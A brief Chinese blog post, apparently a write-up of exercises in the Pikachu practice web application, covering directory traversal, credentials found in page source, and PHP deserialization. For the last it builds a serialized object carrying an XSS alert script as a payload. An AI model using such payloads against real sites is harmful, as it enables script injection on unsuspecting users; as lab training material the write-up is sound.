目录遍历漏洞
这题直接查找你想要的核心文件,比较简单
敏感信息泄露
查看网页源代码发现有账号和密码,直接登录
PHP反序列化
根据概述提示得知
class S{
public $test="pikachu";
}
那么我们开始构建序列化
class S{
public $test="<script>alert(11111)</script>";
}
$t = new S;
echo serialize($t);
得到payload
O:1:"S":1:{s:4:"test";s:29:"<script>alert(11111)</script>";}
标签:11111,Pikachu,alert,简单,test,一些,序列化,public
From: https://www.cnblogs.com/iplkcc/p/16891486.html